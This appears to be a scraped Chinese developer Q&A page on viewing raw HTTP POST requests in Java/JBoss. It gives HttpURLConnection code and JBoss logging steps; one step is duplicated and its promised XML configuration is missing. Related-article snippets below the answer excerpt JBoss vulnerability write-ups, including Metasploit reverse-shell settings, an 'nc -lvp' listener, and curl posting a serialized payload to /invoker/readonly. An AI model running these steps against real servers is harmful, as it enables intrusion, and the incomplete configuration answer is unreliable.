开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

如何从* java/jboss查看我的原始http post *？

从Java/JBoss查看原始HTTP POST的方法如下：

在Java中，可以使用Java的网络编程库来发送HTTP请求并查看原始HTTP POST。常用的库包括HttpURLConnection、HttpClient、OkHttp等。以下是使用HttpURLConnection的示例代码：

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class Main {
    public static void main(String[] args) throws Exception {
        // 创建URL对象
        URL url = new URL("http://example.com/api/endpoint");

        // 打开连接
        HttpURLConnection connection = (HttpURLConnection) url.openConnection();

        // 设置请求方法为POST
        connection.setRequestMethod("POST");

        // 设置请求头
        connection.setRequestProperty("Content-Type", "application/json");

        // 启用输出流，用于发送POST数据
        connection.setDoOutput(true);

        // 构造POST数据
        String postData = "{\"key\": \"value\"}";

        // 获取输出流并写入POST数据
        OutputStream outputStream = connection.getOutputStream();
        outputStream.write(postData.getBytes());
        outputStream.flush();
        outputStream.close();

        // 获取响应码
        int responseCode = connection.getResponseCode();

        // 读取响应数据
        BufferedReader reader = new BufferedReader(new InputStreamReader(connection.getInputStream()));
        String line;
        StringBuilder response = new StringBuilder();
        while ((line = reader.readLine()) != null) {
            response.append(line);
        }
        reader.close();

        // 输出原始HTTP POST请求和响应数据
        System.out.println("Request:");
        System.out.println(connection.getRequestMethod() + " " + url);
        System.out.println(connection.getRequestProperty("Content-Type"));
        System.out.println(postData);
        System.out.println("Response:");
        System.out.println(responseCode);
        System.out.println(response.toString());
    }
}

在JBoss中，可以通过配置日志级别来查看原始HTTP POST请求。具体步骤如下：
a. 打开JBoss的配置文件standalone.xml。
b. 找到<subsystem xmlns="urn:jboss:domain:logging:3.0">节点。
c. 在该节点下找到<logger category="org.apache.http.wire">节点，如果不存在，则添加以下配置：
c. 在该节点下找到<logger category="org.apache.http.wire">节点，如果不存在，则添加以下配置：
d. 保存配置文件并重启JBoss服务器。
e. 在JBoss的日志文件中查找包含HTTP POST请求的日志，通常会包含原始请求和响应数据。

以上是从Java/JBoss查看原始HTTP POST的方法，通过使用Java的网络编程库或配置JBoss的日志级别，可以获取到原始的HTTP POST请求和响应数据。

相关搜索:如何设置HTTP Post实体，如Java的HttpPost.setEntity方法如何在JAVA的HTTP post中传递当前的windows用户凭据？如何修复一个文件的java http post的“早期EOF”错误？如何在http.post之后重定向到带有响应数据的外部URL (从post)如何从节点js的http post请求中获取上传进度信息？如何将http头中的数据从MVC发布到webapi post方法？Flutter:如何包含从json_serializable到http post body的“模型实例”？如何从发送给NodeMCU的lua的http请求中获取post参数如何设置从Red Hat BPM Suite6.4导入的Java项目来构建JBoss 如何从http url下载含有原始数据的python格式的ms word docx文件如何在没有模板的情况下从django视图模拟HTTP Post请求如何在Java或vbscript中对具有SSO身份验证的URL执行HTTP POST？如何在Java (Android Studio)中将带有值的HTTP Post请求发送给Ubidots 如何从http post响应中处理express中的http状态代码，并将其传递给angularjs控制器如何从Java REST服务中的POST请求有效负载中检索值？如何从http.post (Angular2)调用的PHP文件中捕获回显的值？如何用JAVA/Groovy从Jmeter采样器中删除空的HTTP请求参数如何从loopback自定义方法中检索原始正文缓冲区，以验证webhook POST中的条带签名？如何从32字节的原始私钥中获取java.security.PrivateKey？(Secp256k1算法)

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

MSF中Jboss模块直接利用

MSF中Jboss模块直接利用实验环境： Kali linux 2018 Windows server 2008 x64 JBOSS 4.2.3 安全检测过程：在MSF中本身自带一些针对JBOSS漏洞的攻击模块...，本次测试使用的JBOSS版本为4.2.3。.../meterpreter/reverse_http 这里直接用JAVA payload 7 msf5 > set lhost 192.168.174.130 8 msf5 > set lport 110...3 msf5 > set rport 8080 4 msf5 > set verb POST (这里可以指定不同的请求方法) 5 msf5 > set target 3 6 msf5 > set payload...：把jsp的webshell打包成war，然后放在自己的服务器上，如何打包参考： http://www.mianhuage.com/649.html) 7 msf5 > set target 3 8 msf5

1.4K3 0

Java反序列化漏洞

Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞，来攻击最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS...WebLogic外部只开了一个7001端口，这个端口接受HTTP，T3，SNMP协议，判断协议类型后再把数据路由到内部正确的位置，通过在server上抓包，发现走T3协议时携带了java序列化对象，所以我们只用把这个包文从序列化开始的标记...，有个小坑是不能破坏原始T3协议数据中包装的java对象。...分析流程和之前一样，只不过此处接受的点在jmx上，所以通过的协议也和前两个不同，是HTTP协议，不再赘述，详细的jboss分析可以参看Exploit – JBoss。...给出的http请求报文： POST /invoker/JMXInvokerServlet HTTP/1.1 Host: 172.17.0.2:8080 Content-Type:application/

1.1K3 0

【Java 代码审计入门-05】RCE 漏洞原理与实际案例介绍

java 的反射机制这里就不详细说明了，有兴趣的朋友可以看看我的这篇文章：https://www.cnpanda.net/codeaudit/705.html 有心的朋友可能发现了，上述代码中没有出现任何一个可执行函数...如果用户的输入会影响程序原本的命令执行，那么应该设置一个安全白名单，使用户的输入变成从预定的安全命令集合中进行选择。...若在用户的输入中检测出了非白名单中的命令，那么默认从安全命令集合中选择合适的命令给予替换，或者直接拒绝执行该命令。...的配置可以看到其实这个exploit 利用的点在/seam-booking/home.seam 而exploit/multi/http/jboss_seam_upload_exec的配置：这个...，下面的关键是如何构建我们想要的 JBoss EL 表达式。

1.6K3 0

API管理对SOAP的集成&自定义开发者门户 | API Management学习第五篇

SOAP请求包含带有XML有效负载的HTTP POST请求和一些其他特定于SOAP的标头。...二、将SOAP服务部署到OpenShift 在本实验中，我将在与3scale AMP相同的，OpenShift集群中的JBoss企业应用程序平台（EAP）容器上，运行现有的基于SOAP的Java EE应用程序...对Stores Web Service的getAllStores操作发出POST请求： curl -v -k -X POST --header "Content-Type: application...检查Fuse中间层：使用您的登录凭据从Web浏览器登录OpenShift管理控制台。单击Stores-FIS pod，然后单击Open Java Console： ?...实验中，我们只是将原始注册流逻辑从隐藏在主页中转移到被引用的部分，所以不会改变Developer Portal的外观。在本实验的后续部分中，我们实现更复杂的注册流程，这些注册流程也实现为部分流程。

3.1K2 0

深入浅出URL编码

出处：http://blog.csdn.net/yzhz 杨争一、问题：编码问题是JAVA初学者在web开发过程中经常会遇到问题，网上也有大量相关的文章介绍，但其中很多文章并没有对... / 2、ServletPath是在应用的web.xml中配置。...requestURI = request.getRequestURI(); // 内容为：contextPath/servletPath/pathinfo 浏览器提交过来的原始数据，未被Servlet服务器...解决方案： 1、从最简单，所需代价最小来看，我们对URL以及网页中的编码使用统一的编码对我们来说是比较合适的。如果不使用统一编码的话，我们就需要在程序中做一些编码转换的事情。...这也是我们为什么看到有网络上大量的资料介绍如何对乱码进行处理，其中很多解决方案都只是一时的权宜之计，没有从根本上解决问题。

9631 0

干货分享：基于JBoss的七个Java应用场景

红帽JBoss企业应用平台 7 (JBoss EAP) 是一款市场领先的开源平台，适用于在任意环境中部署现代化 Java 应用。 JBoss EAP 的架构采用创新型、模块化和云就绪设计。...RestfulClient：包含一个将HTTP请求发送到部署到JBoss EAP服务器的RESTful服务的类。客户端在独立于JBoss EAP服务器的Java VM中运行。...接下来：查看下insert new customers的机制： ? @POST批注指示JAX-RS容器将HTTP POST操作发送到此方法。...@Path（“customers /”）注释提供执行此方法所需的根路径之外的其他路径元素这里使用的@Consumes指定HTTP POST请求的主体必须使用XML作为格式。...为了避免端口冲突，将native interface 从9999修改成 10999. ? 将domain master的IP设置成127.0.0.1（因为domain master在本地） ?

2.2K5 0

Dubbo + RestEasy 实现文件上传与下载

WILDLFY服务器，利用jboss resteasy实现文件流方式的上传与下载，方便、简洁。...resteasy-multipart-provider 3.0.9.Final 注解 @MultipartForm -- 将http...请求转化为类的对象 @Consumes("multipart/form-data") -- 只接收MIME TYPE为multipart/form-data的请求代码实现 1、上传上传Rest...; @POST @Path("download") @Consumes(MediaType.MULTIPART_FORM_DATA) @Produces("application/zip")...; import java.util.Arrays; import javax.ws.rs.FormParam; import org.jboss.resteasy.annotations.providers.multipart.PartType

2K1 0

JBoss 5.x6.x 反序列化漏洞复现

0x01 漏洞简介该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。...影响版本: JBoss 5.x JBoss 6.x 0x02 漏洞环境执行下面命令启动漏洞环境： cd /vulhub/jboss/CVE-2017-12149 sudo docker-compose...up -d 首次执行时会有1~3分钟时间初始化，初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。...漏洞检测POC 该漏洞出现在/invoker/readonly请求中，服务器将用户提交的POST内容进行了Java反序列化。...获取目标shell 在接收shell的攻击主机上开启端口监听 nc -lvp 7777 通过二进制POST方式发送攻击载荷exp.ser到 /invoker/readonly curl http://192.168.126.130

4072 0

SpringBoot系列之集成Resteasy实现RESTFul接口

EasyRest：这是Jboss开源的，一款用来定义实现RESTFul应用程序的框架，是基于JAX-RS规范，是JAX-RS API的实现 JAX-RX常用的注解： @javax.ws.rs.Path...// 请求的资源类或资源方法的uri路径 @javax.ws.rs.GET //表示此方法响应HTTP GET请求。...@javax.ws.rs.POST // 表示此方法响应HTTP POST请求。...@javax.ws.rs.Produces //设置Http返回报文，报文体的内容类型 @javax.ws.rs.Consumes //客户端请求的MIME媒体类型 @javax.ws.rs.QueryParam...” 的参数 @javax.ws.rs.PathParam // uri中指定的路径参数绑定到资源方法参数了解了Jboss的Easyrest后，我们通过一个文件上传的例子来搭建一个RESTFul项目，基于

7157 0

resteasy经验谈

resteasy 是java体系中比较成熟的rest框架，也是jax-rs规范的实现之一，dubbox的REST服务框架，就是采用的resteasy实现，近日在实际项目中遇到了几个问题，记录于此：一、...如何用fastjson替换默认的jackson 默认情况下，resteasy使用jackson和jaxb来实现json及xml格式的序列化。...id="WebApp_ID" version="2.4" 2 xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3....org/2001/XMLSchema-instance" 3 xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee 4...http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> 5 Restful Web Application</display-name

1.1K2 0

facebookswift:构建thrift http server(4)--ThriftXHRDecoder,ThriftXHREncoder

跨域》在上一篇博客中解决了thrift http sever的CORS跨域问题，但前端依然没有服务端的正常响应。...ThriftMessage 通过跟踪服务端收到的HTTP POST请求在管道(ChannelPipeline)中的传递流程找到了问题：如下是实现将网络请求分发到thrift服务实例(NiftyProcessor...import org.jboss.netty.handler.codec.http.DefaultHttpResponse; import org.jboss.netty.handler.codec.http.HttpResponseStatus...零零散散的写了好几篇文章，贴出的代码都比较零碎，完整的代码参见码云仓库 https://gitee.com/l0km/common-java/tree/master/common-thrift/src.../main/java/com/facebook/swift/service 重要的修改在ThriftServerService

4891 0

Jboss漏洞利用总结

JMX控制台安全验证绕过漏洞（CVE-2010-0738）漏洞描述该漏洞利⽤⽅法跟CVE-2007-1036⼀样，只是绕过了get和post传输限制，利⽤ head传输⽅式发送payload 影响版本...由于JBoss中invoker/JMXInvokerServlet路径对外开放，JBoss的jmx组件⽀持Java反序列化影响版本实际上主要集中在 jboss 6.x 版本上: Apache Group...AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利...成功反弹shell JBoss 5.x/6.x CVE-2017-12149 反序列化漏洞漏洞描述该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter...该漏洞出现在**/invoker/readonly**请求中，服务器将用户提交的POST内容进行了Java反序列化,导致传入的携带恶意代码的序列化数据执行。

6.3K3 0

揭秘：RESTEasy如何完美支持JAVA 微服务中的多种数据格式

虽说Java EE提供了一个强大的平台，供我们创建、部署和管理企业级微服务，但在本文中，我将展示如何创建一个尽可能小的RESTful微服务。...拥有一个能同时支持这两种格式的RESTful微服务是最理想的;从部署的角度来说，它不仅简洁，具备可扩展性，还有足够的灵活性，可以支持不同类型的内容，从而满足那些其他有调用需求的应用程序。...关于如何建立这个文件的更多信息，以及可用的不同选项，请参阅Tomcat的应用程序部署文档[17]。...不只是“读取” 你可能会发现，很多RESTful web服务的例子，都是只读的，部分也不会有进一步的提示，比如如何去创建、更新和删除这些操作。...小结在此我们已经探讨了RESTEasy架构如何在Java web服务中无缝支持XML和JSON数据传输格式。

1.5K4 0

Tomcat 面试题（总结最全面的面试题！！！）

将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 4、jboss Jboss是一个基于J2EE的开放源代码的应用服务器。...但JBoss核心服务不包括支持servlet/JSP的WEB容器，一般与Tomcat或Jetty绑定使用。 tomcat 如何优化？...配制项：protocol=”org.apache.coyote.http11.Http11NioProtocol” 备注：我们常用的Jetty，Mina，ZooKeeper等都是基于java nio实现...APR：即Apache Portable Runtime，从操作系统层面解决io阻塞问题。...AIO方式，异步非阻塞IO(Java NIO2又叫AIO) 主要与NIO的区别主要是操作系统的底层区别.可以做个比喻:比作快递，NIO就是网购后要自己到官网查下快递是否已经到了(可能是多次)，然后自己去取快递

7565 1

未授权访问漏洞总结

27017 对数据库进行增、删、改、查等高危操作。...默认情况下访问 http://ip:8080/jmx-console 就可以浏览 jboss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。 (2) 风险等级高风险。...再使用漏洞测试工具测试 jmx 组件存在情况通过访问 http://ip:jboss端口/ 看是否能进入 jmx-console 和 web-console 。...② 与 jboss-web.xml 同级的目录下还有一个文件 web.xml找到下面这段 xml 文本把 GET 和 POST 两行注释掉同时 security-constraint 整个部分取消注释,...③ %JBOSS_HOME%\server\default\conf\props\jbossws-users.properties 中删除原始的 admin/admin添加新的用户名密码。 ?

3.4K2 0

干货｜最全的Jboss漏洞复现笔记

\classes\org\jboss\invocation\http\servlet目录下的ReadOnlyAccessFilter.class文件中,其中doFilter函数代码如下可以看出它从http...漏洞原理跟之前的CVE-2017-12149漏洞相似，都是使用了java的反序列化，该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter...JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利...，若出现如下界面则存在漏洞使用nc打开端口监听，再用之前生成的.ser文件，通过POST二进制数据上去，使用nc监听端口，即可拿到shell nc -lvp 4444curl http://192.168.112.148...http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患部署的war包在本地的路径为： JBoss AS 6

5.9K3 0

facebookswift:构建thrift http server(3)--CORS跨域

通过拦截到的这个已经解码成DefaultHttpRequest对象的HTTP请求，至少可以判断替换的HttpServerCodec编解码器已经生效了，但这第一个HTTP请求居然不是浏览器端发出的POST...这就引出了XHR请求的另一个问题CORS ? CORS跨域问题对于HTTP协议，我们最熟悉的最常用HTTP 请求是POST,GET这些，OPTIONS是啥，没见过，唉学艺不精啊。...赶紧去百度查，原来是跨域资源共享(CORS) 。...而我的netty http server并没有响应CORS的机制，所以响应这个OPTIONS请求。 CorsHandler 那么现在的问题变成了如何响应OPTIONS请求?...这个Netty3CorsHandler已经实现了对OPTIONS请求的响应，已经比较完备，只是用JAVA 8写的，我改成了适合JDK1.7编译的版本，参见我修改的JDK 1.7版本：org.jboss.netty3

9712 0

手把手教你在容器云平台上部署Java 应用

包含对Summary 的POST和GET http method....通过访问http://localhost:8080 来查看页面. 如果没有看到该页面，可以查看tomcat的输出日志。...那么类似以下的代码就会写死, 作为对比, 如果是OpenShift, 则建议使用环境变量ENV: pom.xml原始版本: ...在OpenShift Container Platform中部署应用程序涉及三个步骤：从OpenShift容器平台的PostgreSQL 镜像创建数据库服务。...从与数据库服务连接的OpenShift Container Platform的 JBoss Web Server 3.1 Apache Tomcat 8 builder (REDHAT基于开源版tomcat

1.3K3 0

Quarkus中过滤器filter和跨域cors问题(4)

前言 Quarkus中的web模块是基于java标准web规范jax-rs构建的，实现则选用了jboss的resteasy。这部分只是请求路由转发部分实现。...基于以上的认知，我们来看看在Quarkus中，怎么写过滤器和解决跨域的问题 Quarkus技术交流QQ群：871808563 resteasy4.4.5开发文档：https://docs.jboss.org...}, 100); } } Quarkus中的跨域 1、Quarkus中解决跨域问题，可以从两个层面来分析，一个是resteasy的角度。...) { super.setAllowedMethods("OPTIONS, GET, POST, DELETE, PUT, PATCH"); super.setAllowedHeaders...从vertx的handler就拦截到了请求并做了跨域处理，但是跨域功能默认不是开启的，我们可以基于以下的配置来激活它，并进行相关的设置： quarkus.http.cors=true quarkus.http.cors.origins

3622 0

Exploiting Jolokia Agent with Java EE Servers

0x00 - About Jolokia Jolokia 是一个通过 HTTP 的 JMX 连接器，提供了类 RESTful 的操作方式，可以通过 POST JSON 的方式访问和修改 JMX 属性、执行...或者 POST 一个 JSON： ?...可以通过向 Jolokia 发送 POST 请求来触发： ? 熟悉 Java 安全的朋友可能会注意到，这里可能有一个 JNDI 注入。...的确，在 WAR Agent 的情况下，此处存在一个 JNDI 注入，问题发生在 agent\jsr160\src\main\java\org\jolokia\jsr160\Jsr160RequestDispatcher.java...Deploy WAR JBoss 中，通过 JMX Console 部署 WAR 是最为人所知的，JBoss 中的 jboss.system:service=MainDeployer 提供了这个方法。

1.7K6 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭